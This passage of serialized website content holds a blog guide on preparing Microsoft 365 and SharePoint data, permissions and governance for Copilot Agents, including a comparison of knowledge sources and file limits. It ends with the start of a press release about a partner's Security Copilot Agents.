customers.",[186,17481,17483],{"id":17482},"step-1-check-core-sharing-settings","Step 1: Check Core Sharing Settings",[12,17485,47],{},[12,17487,17488],{},"Verify tenant-wide settings that could lead to oversharing. For example, scrutinize default link sharing policies (e.g. if “Anyone with the link” or “People in your organization” is allowed by default for SharePoint/OneDrive), whether users can create public Teams by default, and if your Power Platform environment is open without governance. 
Misconfigured defaults here are a common cause of unintentional broad access..",[186,17490,17492],{"id":17491},"step-2-audit-public-teams","Step 2: Audit Public Teams",[12,17494,47],{},[12,17496,17497,17498,17501],{},"Review any Microsoft Teams marked as “Public.” A public Team means ",[4328,17499,17500],{},"anyone in your organization"," can discover and access its content. Ensure that any Team set to public truly contains only non-sensitive, broadly suitable content. If not, switch it to private or adjust membership. (It’s easy for a Team to be created as Public and later forgotten, exposing files to all employees.)",[186,17503,17505],{"id":17504},"step-3-review-graph-connectors","Step 3: Review Graph Connectors",[12,17507,47],{},[12,17509,17510,17511,17514,17515,17518],{},"Check if your tenant has any ",[4328,17512,17513],{},"Microsoft Graph Connectors"," set up that pull in third-party data (e.g. from external file systems, wikis, etc.). Remove or secure any connector that indexes data not everyone should see. ",[251,17516,17517],{},"Why?"," Content indexed via Graph Connectors becomes part of your Microsoft Graph search index – meaning Copilot can potentially use it to answer prompts. You only want relevant, intended data sources connected.",[186,17520,17522,17523],{"id":17521},"step-4-generate-a-sharepoint-online-baseline-report","Step 4: Generate a ",[251,17524,17525],{},"SharePoint Online Baseline Report",[12,17527,47],{},[12,17529,17530],{},"SPO has different possible risks for unwanted data in Agents and Copilot. 
You need to look for different key metrics:",[1255,17532,17533,17536,17539,17542,17545,17548],{},[1258,17534,17535],{},"Broken Permission Inheritance on a folder-level",[1258,17537,17538],{},"Public SharePoint Sites",[1258,17540,17541],{},"Use of \"Everyone Except External Users\" or other dynamic group that contain all users",[1258,17543,17544],{},"Anyone Sharing Links",[1258,17546,17547],{},"Everyone-in-my-org Sharing Links",[1258,17549,17550],{},"Unwanted people in the Site Admins / Owners / Members / Visitors Group",[186,17552,17554],{"id":17553},"step-5-categorize-and-prioritize-risks","Step 5: Categorize and Prioritize Risks",[12,17556,47],{},[12,17558,17559],{},"Take the findings from Steps 1–4 and rank them by severity. Which sites or files carry the most business-critical or sensitive data and also have exposure risks? Prioritize fixing those. By layering business context (e.g., a site with financial data vs. a site with generic templates), you can focus on the most impactful issues first.",[186,17561,17563],{"id":17562},"step-6-involve-site-owners-for-access-reviews","Step 6: Involve Site Owners for Access Reviews",[12,17565,47],{},[12,17567,17568,17569,17572],{},"For each SharePoint site (or Team) highlighted as risky, have the site owner double-check who has access and if that is appropriate. Owners are typically closest to the content and can quickly spot “Oh, why does ",[4328,17570,17571],{},"Everyone"," have read access to this? That shouldn’t be.” Implement a process where site admins certify permissions regularly.",[186,17574,17576],{"id":17575},"step-7-establish-ongoing-oversight","Step 7: Establish Ongoing Oversight",[12,17578,47],{},[12,17580,17581],{},"Put in place a continuous monitoring process for new oversharing issues. Oversharing control isn’t a one-time fix; as new sites, Teams, and files get created, you need to catch misconfigurations proactively. 
Consider using Microsoft Purview’s reports or alerts to catch things like files shared externally or to huge groups, new public teams created, etc. Microsoft’s tools can automate alerts for these conditions, so make use of them to maintain a strong posture.",[186,17583,17585],{"id":17584},"step-8-apply-sensitivity-labels-and-dlp-policies","Step 8: Apply Sensitivity Labels and DLP Policies",[12,17587,47],{},[12,17589,17590,17591,17594,17595,17598],{},"Use Microsoft Purview ",[251,17592,17593],{},"Sensitivity Labels"," to classify data (Confidential, Highly Confidential, etc.) and bind those labels to protection settings. For instance, a “Confidential” label can encrypt files or prevent external sharing. Also configure ",[251,17596,17597],{},"Data Loss Prevention (DLP)"," policies to prevent or monitor oversharing of sensitive info (like blocking someone from emailing a list of customer SSNs). These tools not only prevent accidental leaks in day-to-day use, they also work with Copilot: if Copilot tries to access or output labeled content in ways it shouldn’t, DLP can intervene. Moreover, Copilot itself will carry forward the document’s label to its responses, as noted later.",[186,17600,17602],{"id":17601},"step-9-implement-power-platform-governance","Step 9: Implement Power Platform Governance",[12,17604,47],{},[12,17606,17607],{},"Extend your oversight to the Power Platform (Power Apps, Power Automate, etc.). Define DLP policies for Power Platform to control connectors (so someone can’t, say, make a flow that pulls data from a sensitive SharePoint list and posts it to an external service). Also consider having multiple environments (Dev/Test/Prod) with proper security so that “Citizen Developers” building agents or apps don’t inadvertently expose data. 
Essentially, prevent the Power Platform from becoming an ungoverned backdoor to your data.",[186,17609,17611],{"id":17610},"step-10-educate-and-enable-your-agent-builders","Step 10: Educate and Enable Your Agent Builders",[12,17613,47],{},[12,17615,17616],{},"Finally, create guidelines and best practices for those who will be building or deploying AI agents (whether they are pro developers or business users). Establish training on handling data safely: e.g., how to choose appropriate knowledge sources for an agent, why not to include sensitive files in a broadly shared agent, how to test an agent’s output for any unexpected info. By fostering a data-aware culture among “agent makers,” you reduce the chance of someone inadvertently exposing information when designing an AI solution.",[12,17618,17619],{},[251,17620,17621],{},"Sources:",[1255,17623,17624,17630],{},[1258,17625,17626],{},[2630,17627,17628],{"href":17628,"rel":17629},"https://techcommunity.microsoft.com/blog/microsoft365copilotblog/from-oversharing-to-optimization-deploying-microsoft-365-copilot-with-confidence/4357963",[3135],[1258,17631,17632],{},[2630,17633,17634],{"href":17634,"rel":17635},"https://techcommunity.microsoft.com/blog/microsoft365copilotblog/microsoft-graph-connectors-update-expand-copilot%E2%80%99s-knowledge-with-50-million-ite/4243648",[3135],[12,17637,17638],{},"After you have completed these steps, you can now securely go on and start building productive agents. To build agents, we have different platforms and features from Microsoft that we can rely on for. You'll find the most prominent examples in the next chapter. If you need help with this list, feel free to reach out to us so we can help you with this important preparation exercise.",[12,17640,17641],{},"Nothing prevents you in the meanwhile to create PoC or Test-Agents with sample data, manually uploaded files or specific data attached via RAG. 
But we recommend these steps before a larger implementation / rollout of agents.",[41,17643,17645],{"id":17644},"understanding-differences-between-agent-platforms","Understanding differences between Agent Platforms",[12,17647,31],{},[186,17649,17651],{"id":17650},"step-1-understand-your-agent-creators","Step 1: Understand your Agent-Creators",[12,17653,47],{},[12,17655,17656,17657,17660],{},"After the foundation work to prepare the data, we need to understand which platforms are available to create those agents. We try to differentiate these tools by features and possibilities, but it's important to notice that creating agents and choosing the right tolling is a range. There are multiple ways to build AI agents in the Microsoft ecosystem. It’s important to pick the right one for your needs and your team’s skill level. It also clarifies when to leverage ",[251,17658,17659],{},"Azure AI Foundry"," versus built-in Copilot Studio tools.",[12,17662,17663],{},"Microsoft offers a set of different tools that can build agents by today. While they seem like each other, they are built for different target audiences and levels of expertise. Take a closer look at the overview below. Understanding who needs to create and maintain these agents, also shows us, which Knowledge sources (= data) we need to prepare for our Agents. Beside the tools in the list below, there are even more pro-code solutions to build agents like M365 Agents Toolkit, Visual Studio Code, Agent SDK and more.  
All our data preparation steps apply to them as well, since they access the same data as other agents do.",[12,17665,17666,540,17668],{},[251,17667,17438],{},[2630,17669,17670],{"href":17670,"rel":17671},"https://www.egroup-us.com/news/microsoft-copilot-ai-integration/",[3135],[17454,17673,420,17674,420,17677],{},[17457,17675],{"media":17459,"srcSet":17676},"https://res.cloudinary.com/c4a8/image/upload/v1756363984/blog/pics/table-copilot-ai-integration.png",[2772,17678],{"src":17676,"alt":17679},"Comparison of three Copilot solution categories: Pre-Built (ootb), Makers, and Developers.",[186,17681,17683],{"id":17682},"step-2-identify-use-cases-and-requirements-for-your-platform","Step 2: Identify Use Cases and requirements for your platform",[12,17685,47],{},[12,17687,17688],{},"As you can probably imagine, not every platform supports every use case. Agents can be used for simple tasks, like answering questions based on existing knowledge, or complex ones, like automatically generating answers or executing processes. Also, the final UX, where and how we want to access those agents, is important when deciding on a platform.",[12,17690,17691],{},[2772,17692],{"alt":17693,"src":17694},"Diagram showing three levels of agent capabilities from simple to advanced","https://res.cloudinary.com/c4a8/image/upload/blog/pics/agents-differences.png",[12,17696,17697],{},"With these considerations in mind, we usually try to use the easiest solution possible to build our Agent. But we also need to find a solution that is scalable for further development. Not every Agent needs to be built on Azure AI Foundry from the very beginning.",[12,17699,17700],{},[251,17701,17702],{},"Tip:",[2109,17704,17705],{},[12,17706,17707],{},"If you are not sure where to start building your Agent, you can always use Copilot Studio, integrate more data from Azure AI there, and publish it to Microsoft 365 Copilot. 
So you get both \"up- and downwards compatibility\".",[41,17709,17711],{"id":17710},"rag-retrieval-augumented-generation-vs-sharepoint-vs-upload","RAG (Retrieval-Augmented Generation) vs. SharePoint vs. Upload",[12,17713,31],{},[12,17715,17716,17717,17720],{},"At first glance, everything seems to be RAG – but there are differences! When you first explore Copilot Agents and their agent capabilities, it’s tempting to assume that all knowledge integration follows the same RAG (Retrieval-Augmented Generation) pattern. While they may all ",[4328,17718,17719],{},"look"," like RAG from the outside: retrieving documents and generating answers, the way they work under the hood differs significantly. Understanding these differences is essential for choosing the right approach based on your goals, scale, and technical readiness. Here is a short explanation and overview.",[186,17722,17724],{"id":17723},"manual-file-uploads","Manual File Uploads",[12,17726,47],{},[12,17728,17729,17730,17733],{},"Manual upload is the simplest way to add knowledge to a Copilot agent. You drag and drop documents directly into the Copilot Studio interface. Microsoft automatically indexes these files and retrieves relevant content during a user query. This is ideal for small pilots and early testing. ",[251,17731,17732],{},"Also, be aware that the content of the files should be accessible to everyone with access to the agent",". There is no permission management here that you need to take care of. On the other hand, you will need to manually update these files in the long term if things change. 
Currently, you can add up to 20 files manually to a Copilot Agent.",[12,17735,17736,17737],{},"Source: ",[2630,17738,17741],{"href":17739,"rel":17740},"https://learn.microsoft.com/en-us/microsoft-365-copilot/extensibility/copilot-studio-agent-builder-knowledge",[3135],"https://learn.microsoft.com/en-us/microsoft-365-copilot/extensibility/copilot-studio-agent-builder-knowledge#file-size-limits",[186,17743,17745],{"id":17744},"sharepoint-online","SharePoint Online",[12,17747,47],{},[12,17749,17750],{},"This method uses Microsoft’s Retrieval API to access content directly from SharePoint Online connected via Graph Connector. The agent retrieves the most relevant content live at query time, respecting existing Microsoft 365 permissions. Content can be SharePoint sites, document libraries, folders or files. It’s dynamic, secure, and well-suited for scaling across departments or business units without managing your own infrastructure. Building on the existing infrastructure, we use the built-in security model from SharePoint, which is a huge benefit compared to other knowledge options. Departments can easily update the files, and that will be reflected within the agent. That means if two users with different access levels ask the agent, one might get an answer from a certain file while another user (without access) would not – which is exactly the behavior we want.",[12,17752,17753],{},"Note: SharePoint Lists are currently not a supported knowledge type, so you cannot index them out of the box (Q3 2025).",[186,17755,17757],{"id":17756},"custom-rag-self-managed","Custom RAG (Self-Managed)",[12,17759,47],{},[12,17761,17762],{},"In a classic RAG setup, you build and manage the entire retrieval pipeline yourself. That includes document preprocessing, chunking, embedding, storing in a vector database, and retrieving the top matches at query time. 
This gives you full control over how content is processed and retrieved, but it also brings complexity and maintenance overhead. It’s best suited for advanced use cases that require customization beyond what Microsoft’s managed services offer. This is not a built-in feature of Copilot or Copilot Studio; we would do this in Microsoft Azure.",[12,17764,17765],{},"An example of when to use RAG: if you need to integrate an AI agent with a proprietary database or thousands of PDFs stored outside of Microsoft 365, and apply custom filters, a self-managed RAG might be necessary – but this requires significant effort.",[12,17767,17768,17769],{},"Source: ",[2630,17770,17771],{"href":17771,"rel":17772},"https://learn.microsoft.com/en-us/azure/search/retrieval-augmented-generation-overview?tabs=docs",[3135],[186,17774,17776],{"id":17775},"what-to-choose-and-when","What to Choose and When",[12,17778,47],{},[12,17780,17781],{},"While all three approaches involve retrieving content to support language generation, only the custom self-managed solution qualifies as “true RAG” in the technical sense. For most organizations starting out, manual uploads or SharePoint connections are significantly easier and faster to implement. They provide strong results with minimal setup - and they let teams focus on use case design and adoption, rather than infrastructure.",[12,17783,17784],{},"Some general advice from my side on this point:",[2109,17786,17787],{},[12,17788,17789],{},"Try to build the agents as close to your data as possible",[12,17791,17792],{},"Example: If your data is stored in large SQL databases or external CRM systems, a SharePoint Agent will not do the job. If all your knowledge is in SharePoint, SharePoint Agents or Copilot Agents might be a good start.",[12,17794,17795],{},"Custom RAG should be considered only when your needs go beyond what the managed options can provide, not as the default starting point. 
A manual upload is great for a first pilot or for small pilots with limited and specific knowledge that is not updated often. In many scenarios we would just use a SharePoint library or site with the agent. Because of this, we are focusing on a scenario that looks like this:",[41,17797,17799],{"id":17798},"microsoft-365-copilot-copilot-agents-security-compliance-out-of-the-box","Microsoft 365 Copilot & Copilot Agents: Security & Compliance out of the box",[12,17801,31],{},[12,17803,17804,17807],{},[251,17805,17806],{},"Secure cloud infrastructure"," is the bedrock for enterprise AI. Microsoft provides the most secure framework possible for our Agents by putting them in the context of Microsoft 365 Copilot. Every organization can rely on its existing security framework based on Conditional Access and multi-factor authentication for access, and on its existing governance framework based on Microsoft Purview.",[12,17809,17810],{},"Agents that are used in M365 Copilot or published from Copilot Studio as a Teams chatbot are only accessible within our tenant boundaries. 
That means these applications get the same level of security that we already have.",[12,17812,17813],{},[2772,17814],{"alt":17815,"src":17816},"Diagram showing how Microsoft 365 Copilot accesses user data within Microsoft 365.","https://res.cloudinary.com/c4a8/image/upload/blog/pics/copilot-security.png",[12,17818,17819],{},"In addition, Microsoft offers several technical and organizational commitments, gathered under what it calls \"Enterprise Grade Data Protection\".",[12,17821,17736,17822],{},[2630,17823,17441],{"href":17441,"rel":17824},[3135],[186,17826,17828],{"id":17827},"microsoft-365-copilot-enterprise-data-protection-edp-for-prompts-and-responses","Microsoft 365 Copilot: Enterprise Data Protection (EDP) for Prompts and Responses",[12,17830,47],{},[1255,17832,17833,17852,17858,17878,17884],{},[1258,17834,17835,17838,17839,4598,17842,17845,17846,4598,17849,1014],{},[251,17836,17837],{},"Contractual Protection",": Prompts (user input) and responses (Copilot output) are protected under the ",[251,17840,17841],{},"Data Protection Addendum (DPA)",[251,17843,17844],{},"Product Terms",". These protections are the same as those applied to ",[251,17847,17848],{},"emails in Exchange",[251,17850,17851],{},"files in SharePoint",[1258,17853,17854,17857],{},[251,17855,17856],{},"Data Security:"," Encryption at rest and in transit, physical security controls, and tenant-level data isolation.",[1258,17859,17860,17863,17864,17867,17868,805,17871,805,17874,17877],{},[251,17861,17862],{},"Privacy Commitments:"," Microsoft acts as a ",[251,17865,17866],{},"data processor",", using data only as instructed by the customer. 
Supports ",[251,17869,17870],{},"GDPR",[251,17872,17873],{},"EU Data Boundary",[251,17875,17876],{},"ISO/IEC 27018",", and more.",[1258,17879,17880,17883],{},[251,17881,17882],{},"Access Control & Policy Inheritance",": Copilot respects identity models and permissions, sensitivity labels, retention policies, audit settings, and admin configurations. AI & copyright risk mitigation provides protection against prompt injection, harmful content, and copyright issues (via protected material detection and the Customer Copyright Commitment).",[1258,17885,17886,17889],{},[251,17887,17888],{},"No Model Training:"," Prompts, responses, and Microsoft Graph data are NOT used to train foundation models.",[186,17891,17893],{"id":17892},"copilot-agents-with-sharepoint-online-knowledge","Copilot Agents with SharePoint Online Knowledge:",[12,17895,47],{},[1255,17897,17898,17908],{},[1258,17899,17900,17903,17904,17907],{},[251,17901,17902],{},"Permission & Sharing Model:"," Agents with SharePoint Online access always respect the permissions of the associated SharePoint site. That means, ",[251,17905,17906],{},"on one hand, you need to ensure that everyone who should have access has at least read permissions on the site","; on the other hand, you must be vigilant about not granting unnecessary permissions that could expose sensitive information to unauthorized users. Properly configuring permissions is essential, as Copilot Agents will only be able to access and surface content that the querying user is permitted to see. Additionally, leveraging Microsoft Purview information protection ensures that sensitivity labels and data loss prevention (DLP) policies persist with the content.",[1258,17909,17910,17913,17914,17917],{},[251,17911,17912],{},"Persistent Labels & DLP:"," Enable ",[251,17915,17916],{},"Microsoft Purview"," information protection so that sensitivity labels persist with content. Copilot agents inherit the labels of source documents. 
This means that if a file is classified “Confidential,” any AI-generated content or document derived from it will carry that label forward. This persistent label inheritance works in tandem with Data Loss Prevention policies to prevent AI from inadvertently exposing protected data. In practice, that means even if Copilot summarizes a sensitive file, the summary will be handled as sensitive too. This is something outstanding that we do not find outside of Microsoft 365, and we won't see any other AI Agent that is able to integrate this deeply into the Microsoft 365 ecosystem!",[41,17919,17921],{"id":17920},"best-practices-to-prepare-further-sharepoint-online-for-agent-use","Best Practices to further prepare SharePoint Online for Agent use",[12,17923,31],{},[12,17925,17926],{},"To prepare SharePoint Online for effective use with Copilot Agents, follow these best practices:",[186,17928,17930],{"id":17929},"dedicated-sharepoint-site","Dedicated SharePoint Site",[12,17932,47],{},[12,17934,17935],{},"First, create a dedicated SharePoint site or a specific folder designed exclusively for your Copilot Agent’s knowledge base. This approach helps minimize issues related to oversharing and reduces the risk of users accidentally uploading sensitive or irrelevant files to the agent’s accessible repository. If you decide to use an existing SharePoint site, carefully review its contents to ensure that no confidential or sensitive information is stored there that should not be discoverable by the agent.",[186,17937,17939],{"id":17938},"granting-access","Granting Access",[12,17941,47],{},[12,17943,17944,17945,17948],{},"It is also important to ensure that all intended users have the necessary read permissions to access the site or folder. 
If you need to grant access manually, ensure all intended users have read access to the site (for example, by ",[251,17946,17947],{},"adding them to the SharePoint site’s Visitors group"," or an appropriate Azure AD security group) to simplify the process and prevent accidental permission misconfigurations.",[186,17950,17952],{"id":17951},"prepare-files","Prepare Files",[12,17954,47],{},[12,17956,17957,17958,17961,17962,17965],{},"When preparing documents for use with Copilot Agents, remember that the AI currently ",[251,17959,17960],{},"cannot interpret embedded images within"," files. ",[251,17963,17964],{},"Therefore, add descriptive image captions or alternative text"," to help ensure that important visual information is not lost. For text-heavy documents that Copilot should summarize or reference, keep the total to a maximum of 1.5 million words or 300 pages to ensure Copilot works effectively.",[12,17967,17968,17969,17972],{},"For ",[251,17970,17971],{},"Excel files",", organize your data so that each file focuses either on numbers or on text, as mixed-content tables tend to yield less accurate results. Agents also respond most reliably to queries when the relevant data is contained within a single sheet of the workbook.",[12,17974,17975],{},[4328,17976,17977],{},"Agents respond best to Excel data when it’s contained in one sheet.",[12,17979,17980],{},"Example: If you have a large customer feedback survey stored in a single Excel file, separate the quantitative data (such as ratings and numerical responses) from the qualitative data (such as free-text feedback) into two different sheets. 
This method allows you to use tools like Python and Excel formulas to efficiently analyze the numerical data (e.g., calculate averages, sort results, determine confidence levels), while leveraging M365 Copilot’s sentiment analysis features to gain insights from the text-based feedback.",[186,17982,17984],{"id":17983},"file-limitations","File Limitations",[12,17986,47],{},[12,17988,17989,17990],{},"Finally, be aware of the file types and size limitations supported by Copilot Agents and Copilot Studio. The following table outlines current support:",[2630,17991,17741],{"href":17739,"rel":17992},[3135],[12,17994,17995,17996],{},"Also take note of the best practices Microsoft has shared on document lengths: ",[2630,17997,17998],{"href":17998,"rel":17999},"https://support.microsoft.com/en-gb/topic/keep-it-short-and-sweet-a-guide-on-the-length-of-documents-that-you-provide-to-copilot-66de2ffd-deb2-4f0c-8984-098316104389",[3135],[18001,18002],"v-table",{":head":7656,":hide-container":7656,":table":18003},"fileLimitations",[12,18005,18006],{},"Currently unsupported file types in SharePoint Online: everything else that is not listed in the table is not officially supported.",[12,18008,18009],{},"Certain file types, such as CSV files, may function adequately even though they are not officially supported because they closely resemble plain text formats. However, most other file types—particularly container files like CAB, EXE, ZIP, as well as image, video, and audio formats such as PNG, IMG, MP3, and MP4—are not supported at this time.",[41,18011,18013],{"id":18012},"final-thoughts","Final thoughts",[12,18015,31],{},[12,18017,18018],{},"By following these recommendations, you can ensure that your Copilot Agents have access to well-structured, secure, and high-quality data, maximizing their usefulness and minimizing the risk of accidental data exposure. 
Investing time in preparing your SharePoint environment sets a strong foundation for successful AI agent deployment and adoption within your organization.",[12,18020,18021],{},"In fact, many of our \"Build-an-Agent\" projects start exactly with that: not building the agent, but preparing the infrastructure and knowledge so that we have good-quality data for the AI to use, because the Agent is only as good as the system beneath it!",[41,18023,18025],{"id":18024},"want-to-learn-more","Want to learn more?",[12,18027,31],{},[12,18029,18030],{},"Join our webcast to learn how to prepare your M365 environment for Copilot Agents, from infrastructure and data governance to platform decisions.",[52,18032,18036],{"className":18033},[18034,3053,18035,3055],"cta-list__item","mr-3",[2630,18037,18041],{"role":3058,"className":18038,"dataText":18039,"href":18040,"type":3068,"ctatext":18039,"ctahref":18040,"ctatype":3068},[3060,3061,3062,3063,3064,3065],"Read the full article","/blog/corporate/2025/03/mssp-2025-en",[102,18042,18044],{"className":18043},[3072],"Register now",{"title":65,"searchDepth":111,"depth":111,"links":18046},[18047,18048,18049,18062,18066,18072,18076,18082,18083],{"id":4574,"depth":111,"text":4575},{"id":17397,"depth":111,"text":17398},{"id":17473,"depth":111,"text":17474,"children":18050},[18051,18052,18053,18054,18056,18057,18058,18059,18060,18061],{"id":17482,"depth":329,"text":17483},{"id":17491,"depth":329,"text":17492},{"id":17504,"depth":329,"text":17505},{"id":17521,"depth":329,"text":18055},"Step 4: Generate a SharePoint Online Baseline 
Report",{"id":17553,"depth":329,"text":17554},{"id":17562,"depth":329,"text":17563},{"id":17575,"depth":329,"text":17576},{"id":17584,"depth":329,"text":17585},{"id":17601,"depth":329,"text":17602},{"id":17610,"depth":329,"text":17611},{"id":17644,"depth":111,"text":17645,"children":18063},[18064,18065],{"id":17650,"depth":329,"text":17651},{"id":17682,"depth":329,"text":17683},{"id":17710,"depth":111,"text":17711,"children":18067},[18068,18069,18070,18071],{"id":17723,"depth":329,"text":17724},{"id":17744,"depth":329,"text":17745},{"id":17756,"depth":329,"text":17757},{"id":17775,"depth":329,"text":17776},{"id":17798,"depth":111,"text":17799,"children":18073},[18074,18075],{"id":17827,"depth":329,"text":17828},{"id":17892,"depth":329,"text":17893},{"id":17920,"depth":111,"text":17921,"children":18077},[18078,18079,18080,18081],{"id":17929,"depth":329,"text":17930},{"id":17938,"depth":329,"text":17939},{"id":17951,"depth":329,"text":17952},{"id":17983,"depth":329,"text":17984},{"id":18012,"depth":111,"text":18013},{"id":18024,"depth":111,"text":18025},{"lang":2170,"seoTitle":18085,"titleClass":2172,"date":18086,"categories":18087,"blogtitlepic":18089,"socialimg":18090,"customExcerpt":18091,"keywords":18092,"maxContent":2180,"fileLimitations":18093,"asideNav":18119,"hreflang":18139,"footer":18144,"scripts":18145,"published":2180},"How to Prepare Your M365 Data for Copilot Agents","2025-08-28",[18088],"Workplace","head-microsoft-copilot.jpg","/blog/heads/head-microsoft-copilot.jpg","Before Microsoft 365 Copilot Agents can deliver real value, the foundation must be solid: clean data, proper permissions, and a reliable infrastructure. 
This guide explains why data quality determines AI success, highlights risks like oversharing and silos, and outlines 10 practical steps to make your M365 environment agent-ready—secure, compliant, and scalable.","Microsoft 365 Copilot, Copilot Agents, M365 data governance, AI readiness, SharePoint data security, M365 infrastructure, oversharing prevention, AI data preparation, Microsoft 365 security, agent-ready M365",[18094,18098,18102,18105,18108,18110,18112,18114,18115,18117],[18095,18096,18097],"File type","SharePoint Online - Limit","Manual Upload - Limit",[18099,18100,18101],".doc","150 MB","100 MB",[18103,18104,18101],".docx","512 MB",[18106,18100,18107],".html","not supported",[18109,18104,18101],".pdf",[18111,18100,18101],".ppt",[18113,18104,18101],".pptx",[11633,18100,18101],[18116,18100,18101],".xls",[18118,18100,18101],".xlsx",{"menuItems":18120},[18121,18124,18127,18130,18133,18136],{"href":18122,"text":18123},"#why-your-infrastructure-data-matters","Why Infrastructure Matters",{"href":18125,"text":18126},"#_10-steps-to-improve-your-m365-data-infrastructure-now","10 Steps for M365 Data",{"href":18128,"text":18129},"#understanding-differences-between-agent-platforms","Understanding Agent Platform",{"href":18131,"text":18132},"#rag-retrieval-augumented-generation-vs-sharepoint-vs-upload","RAG vs. SharePoint vs. 
Upload",{"href":18134,"text":18135},"#microsoft-365-copilot-copilot-agents-security-compliance-out-of-the-box","M365 Copilot: Security",{"href":18137,"text":18138},"#best-practices-to-prepare-further-sharepoint-online-for-agent-use","SharePoint Best Practices",[18140,18142],{"lang":2260,"href":18141},"/de/posts/2025-08-26-agent-ready-infrastructure",{"lang":2170,"href":18143},"/es/posts/2025-08-26-agent-ready-infrastructure",{"noMargin":2180},{"slick":2180},"/posts/2025-08-28-agent-ready-infrastructure",{"title":17374,"description":65},"posts/2025-08-28-agent-ready-infrastructure",[18150,18151,18152,18153],"Microsoft 365 Copilot","M365 Data Governance","SharePoint Security","AI Data Preparation","2hdg_i1twgpYMpOuTEHoxUh3A2EPPpla-Ksx4Jk0VXU",{"id":18156,"title":18157,"author":18158,"body":18159,"cta":2165,"description":65,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":18266,"moment":2165,"navigation":2180,"path":18311,"seo":18312,"stem":18313,"tags":18314,"webcast":2167,"__hash__":18318},"content_es/posts/2025-09-30-security-store.md","Among the first worldwide: glueckkanja Security Copilot Agents",[2460],{"type":9,"value":18160,"toc":18261},[18161,18165,18167,18170,18172,18175,18178,18181,18184,18188,18195,18199,18209,18220,18243,18254],[41,18162,18164],{"id":18163},"en-el-lanzamiento-de-microsoft-security-store-glueckkanja-presentó-10-security-copilot-agents","At the launch of Microsoft Security Store, glueckkanja presented 10 Security Copilot Agents",[12,18166,31],{},[12,18168,18169],{},"Offenbach, Germany – September 30, 2025 – glueckkanja today announces that it has joined the Microsoft Security Store partner ecosystem. 
As one of the first selected partners, glueckkanja stands out for its proven experience in Microsoft security technologies, its innovative spirit and its close collaboration with Microsoft.",[2688,18171],{":quotes":2688,":no-fullscreen":7656},[52,18173],{"style":18174},"padding-top:50px;",[12,18176,18177],{},"We work hand in hand with Microsoft to shape the development of the Microsoft Security Store, providing feedback on new features, integrations and real customer needs. By publishing certified solutions and AI agents that integrate seamlessly with Microsoft Security products, we make it easy for you to discover, purchase and deploy trusted security technologies. Through the Security Store, we help you accelerate your security outcomes and simplify operations with validated solutions that are easy to deploy and designed to work together.",[12,18179,18180],{},"The Microsoft Security Store simplifies how you discover, purchase and deploy trusted solutions and AI agents. With certified integrations, simple billing and rapid deployment, the Security Store helps you strengthen your security posture and focus on what really matters.",[12,18182,18183],{},"The Microsoft Security Store sets a new standard for acquiring and operating cybersecurity solutions. By centralizing a wide range of solutions and AI agents, you can now discover, acquire and deploy advanced security technologies much more quickly. 
Features such as alignment with industry frameworks, simplified billing and guided deployment help your security team reduce complexity, accelerate innovation and get the most out of your security investment.",[41,18185,18187],{"id":18186},"más-información-en-el-blog-oficial-de-microsoft","More information on the official Microsoft blog:",[12,18189,18190],{},[2630,18191,18194],{"href":18192,"rel":18193},"https://techcommunity.microsoft.com/blog/securitycopilotblog/agentic-security-your-way-build-your-own-security-copilot-agents/4454555",[3135],"Agentic Security Your Way: Build Your Own Security Copilot Agents",[41,18196,18198],{"id":18197},"sobre-glueckkanja","About glueckkanja",[12,18200,18201,18204,18205,18208],{},[251,18202,18203],{},"We manage and protect Microsoft ecosystems at scale","\nglueckkanja is one of the leading managed cloud service providers and a prominent Microsoft partner, delivering fully ",[251,18206,18207],{},"cloud-native",", secure and scalable Microsoft environments. With a unified blueprint approach and an Infrastructure-as-Code methodology, we help companies accelerate their digital transformation and cloud adoption: secure, consistent and at scale.",[12,18210,18211,18212,18215,18216,18219],{},"We offer comprehensive managed services for ",[251,18213,18214],{},"Microsoft Azure, Microsoft Entra and Microsoft Intune",", helping you optimize identity and access management, modernize endpoint administration and build compliant Zero Trust infrastructures. 
All of this is complemented by ",[251,18217,18218],{},"24/7 security operations"," and incident response from our own Cybersecurity Operations Center (SOC), ensuring continuous protection, rapid reaction and compliance with the latest standards.",[12,18221,18222,18223,18226,18227,18230,18231,18234,18235,18238,18239,18242],{},"For a truly cloud-native Microsoft experience, we have developed our own tools that simplify management and automate processes: ",[251,18224,18225],{},"KONNEKT"," for secure collaboration with Microsoft 365 data, ",[251,18228,18229],{},"RADIUSaaS"," and ",[251,18232,18233],{},"SCEPman"," for passwordless network authentication integrated with Intune, ",[251,18236,18237],{},"RealmJoin"," for software distribution at scale and ",[251,18240,18241],{},"TerraProvider"," for fully automated provisioning of Cloud PCs and physical devices via Intune.",[12,18244,18245,18246,18249,18250,18253],{},"We were among the first partners worldwide to obtain the ",[251,18247,18248],{},"Microsoft Verified MXDR"," certification, proof of our excellence in managed security operations. 
With around 250 cloud professionals and a track record of success, we have been recognized several times as Microsoft Worldwide Partner of the Year and have been at the top of the ",[251,18251,18252],{},"ISG Microsoft 365"," quadrant in Germany since 2019.",[12,18255,18256,18257,18260],{},"In addition, glueckkanja is among the TOP 100 most innovative companies in Germany, and our ",[251,18258,18259],{},"excellent 4.7/5 score on Kununu"," (the leading employer rating platform in Germany) underlines our culture of excellence and team satisfaction.",{"title":65,"searchDepth":111,"depth":111,"links":18262},[18263,18264,18265],{"id":18163,"depth":111,"text":18164},{"id":18186,"depth":111,"text":18187},{"id":18197,"depth":111,"text":18198},{"lang":2170,"seoTitle":18267,"titleClass":2172,"date":18268,"categories":18269,"blogtitlepic":18271,"socialimg":18272,"customExcerpt":18273,"keywords":18274,"maxContent":2167,"hreflang":18275,"quotes":18280,"contactInContent":18286,"footer":18309,"scripts":18310,"published":2180},"glueckkanja is a launch partner in the Microsoft Security Store with 10 Security Copilot Agents","2025-09-30",[18270],"Security","head-security-agents.jpg","/blog/heads/head-security-agents.jpg","glueckkanja is one of the first partners in the Microsoft Security Store Preview and is launching 10 Microsoft-native Security Copilot Agents for Security, Entra, Intune and Purview. 
